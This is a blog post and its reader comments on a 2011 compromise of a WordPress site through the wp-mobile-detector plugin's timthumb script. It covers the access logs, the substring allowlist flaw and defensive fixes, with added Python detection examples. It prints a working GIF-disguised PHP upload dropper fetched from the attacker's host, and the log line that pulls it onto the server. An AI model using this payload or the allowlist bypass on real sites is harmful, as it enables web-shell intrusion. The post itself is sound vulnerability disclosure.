wp-mobile-detector is insecure (wordpress plugin)

It seems installing the wp-mobile-detector plugin on your wordpress site is a bad idea {tm}

A customer's web server has the following requests in its access log:

[24/Aug/2011:02:10:47 +0100] "HEAD /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://superflickr.com.nu/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
[24/Aug/2011:02:10:48 +0100] "GET /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
[24/Aug/2011:02:10:48 +0100] "POST /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52 "-" "Opera 11.00"
[24/Aug/2011:02:10:49 +0100] "GET /wp-content/uploads/_wp_cache.php HTTP/1.1" 200 12970 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"

_wp_cache.php is one of those all-in-one hacker-delight control-panel scripts (a web shell).
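The four log lines above form a recognisable pattern: a timthumb.php fetch whose src= points at a host that is not really on the allowlist, followed by GET/POST requests to a .php file under the plugin's cache directory, then a request for a .php file under wp-content/uploads. The detection logic below is an added example (Python, not from the post or the plugin) that runs over those same lines plus one constructed benign request; the allowlist is the plugin's, quoted from the post, and the host-matching rule it uses is a proper domain-suffix match rather than the substring test the post criticises.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The four requests quoted from the customer's access log in the post, plus one
# constructed benign request (a thumbnail from a genuine flickr host) for contrast.
# User-agent strings are omitted; they play no part in the detection.
LOG_LINES = [
    '[24/Aug/2011:02:10:47 +0100] "HEAD /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://superflickr.com.nu/index.php HTTP/1.1" 200 -',
    '[24/Aug/2011:02:10:48 +0100] "GET /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52',
    '[24/Aug/2011:02:10:48 +0100] "POST /wp-content/plugins/wp-mobile-detector/cache/27a44a2d2bea4a693389c325a1125aa6.php HTTP/1.1" 200 52',
    '[24/Aug/2011:02:10:49 +0100] "GET /wp-content/uploads/_wp_cache.php HTTP/1.1" 200 12970',
    # constructed benign line
    '[24/Aug/2011:02:11:00 +0100] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://farm1.static.flickr.com/1/2.jpg HTTP/1.1" 200 4120',
]

# Minimal combined-log parser: timestamp, method, request target, status.
LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# The plugin's own allowlist, quoted from the post.
ALLOWED_SITES = ['flickr.com', 'picasa.com', 'blogger.com',
                 'wordpress.com', 'img.youtube.com', 'amazonaws.com']


def host_allowed(host, allowed=ALLOWED_SITES):
    """True only for an allowlisted domain or one of its subdomains."""
    host = host.lower().rstrip('.')
    return any(host == site or host.endswith('.' + site) for site in allowed)


def analyse(lines):
    """Return (timestamp, reason, detail) tuples for suspicious requests."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, method, target = m.group('ts'), m.group('method'), m.group('target')
        path, _, query = target.partition('?')
        if path.endswith('/timthumb.php'):
            # Extract the remote image URL and check its host properly.
            src = parse_qs(query).get('src', [''])[0]
            host = urlsplit(src).hostname or ''
            if not host_allowed(host):
                findings.append((ts, 'timthumb src= from non-allowlisted host', host))
        elif '/cache/' in path and path.endswith('.php'):
            # timthumb's cache should only ever hold images, never executable PHP.
            findings.append((ts, f'{method} to PHP file in timthumb cache directory', path))
        elif path.startswith('/wp-content/uploads/') and path.endswith('.php'):
            findings.append((ts, 'PHP file requested under uploads directory', path))
    return findings


if __name__ == '__main__':
    for ts, reason, detail in analyse(LOG_LINES):
        print(f'{ts}  {reason}: {detail}')
```

Run against the lines above it reports the first four requests and stays silent on the constructed flickr thumbnail. The second and third rules are the cheap ones worth keeping in a web-server alert: a .php request under a cache or uploads directory that returns 200 should never happen on a correctly configured site.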

Making a request to superflickr.com.nu shows:

$ wget -qO - http://superflickr.com.nu/index.php
GIF89a????!?,D;<?php $f=preg_replace('/(.*wp-content).*/i','\1',dirname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);echo "14qhpo"; ?>;

Suffice it to say, this is then stored on the server via timthumb.php. The timthumb.php script does attempt to use a list of allowed sites:

$allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'amazonaws.com',
);

But its check is somewhat flawed:

foreach ($allowedSites as $site) {
      //$site = '/' . addslashes ($site) . '/';
      // substring match: any host merely *containing* an allowed name passes
      if (stristr($url_info['host'], $site) !== false) {
         $isAllowedSite = true;
      }
}

Hence superflickr.com.nu slips through, because the host name contains the string 'flickr.com'.

And then, because the cache filename is an md5 of the remote URL/file, which is predictable, the attacker knows exactly where the saved file will be. A simple .htaccess file denying access to .php files in the 'cache' directory would have prevented this.

Alternatively, the developers could have bothered to check the extension of the URL being retrieved....
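The two weaknesses called out above (the substring allowlist check, and the missing extension check) can be shown side by side. This is an added example in Python, not the plugin's code: is_allowed_site_flawed() reproduces the stristr() substring logic, is_allowed_site_fixed() does what the allowlist was meant to do (exact domain or subdomain), and src_acceptable() adds the extension check; ALLOWED_EXTENSIONS is an assumed list of image types, since the plugin only needs to fetch images.

```python
from urllib.parse import urlsplit

# The plugin's allowlist, quoted from the post.
ALLOWED_SITES = ['flickr.com', 'picasa.com', 'blogger.com',
                 'wordpress.com', 'img.youtube.com', 'amazonaws.com']

# Assumption: the image types a thumbnail resizer has any business fetching.
ALLOWED_EXTENSIONS = ('.jpg', '.jpeg', '.gif', '.png')


def is_allowed_site_flawed(host, allowed=ALLOWED_SITES):
    """Mirrors the plugin's stristr() test: a case-insensitive substring match passes."""
    host = host.lower()
    return any(site.lower() in host for site in allowed)


def is_allowed_site_fixed(host, allowed=ALLOWED_SITES):
    """Accepts the listed domain itself or one of its subdomains, nothing else."""
    host = host.lower().rstrip('.')
    return any(host == site or host.endswith('.' + site) for site in allowed)


def src_acceptable(src_url):
    """Combined check on a src= value: http(s), allowlisted host, image extension."""
    parts = urlsplit(src_url)
    if parts.scheme not in ('http', 'https') or not parts.hostname:
        return False
    if not is_allowed_site_fixed(parts.hostname):
        return False
    return parts.path.lower().endswith(ALLOWED_EXTENSIONS)


if __name__ == '__main__':
    for host in ('farm1.static.flickr.com', 'superflickr.com.nu', 'flickr.com.nu', 'notflickr.com'):
        print(f'{host:28} flawed={is_allowed_site_flawed(host)!s:5} fixed={is_allowed_site_fixed(host)}')
    print(src_acceptable('http://superflickr.com.nu/index.php'))
    print(src_acceptable('http://farm1.static.flickr.com/1/2.jpg'))
```

The extension check is a filter, not a guarantee: the remote host still controls the bytes it returns, whatever the URL ends in. The control that actually closes the hole is never writing fetched content to a filename the web server will execute, and never serving .php from the cache directory, which is why the .htaccess rule above matters more than the allowlist.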


6 responses to “wp-mobile-detector is insecure (wordpress plugin)”

  1. Acouphene

    Did you contact the plugin developers to tell them about this issue?

  2. David Goodwin

    Acouphene – yes; they replied saying they were releasing a fix in a couple of days time (which I believe they have done).

  3. Geoff

    I am hoping the fix has been done. I installed the free version on a couple of my blogs earlier today via the WordPress plugin so I could try it out.

  4. lorraine

    This has not been fixed. I bought and installed the plugin in July and my whole site was corrupted with Malware. I contacted support several times to no avail. I wasted days and days rebuilding. I tried again and cleaned first: my results were:

    This file may contain malicious executable code
    Filename: wp-content/plugins/a-wp-mobile-detector/functions.php
    File type: Not a core, theme or plugin file.
    Issue first detected: 31 secs ago.
    Severity: Critical
    Status New
    This file is a PHP executable file and contains a line 2045 characters long without spaces that may be encoded data along with functions that may be used to execute that code. If you know about this file you can choose to ignore it to exclude it from future scans.

    Do not use.

  5. David Goodwin

    Lorraine – I suspect you’re using an old version somewhere. I think the problem has been fixed.

  6. Joshua Odmark

    This issue was fixed shortly after David brought it to our attention.

    Lorraine, please feel free to contact me if you’re still having issues.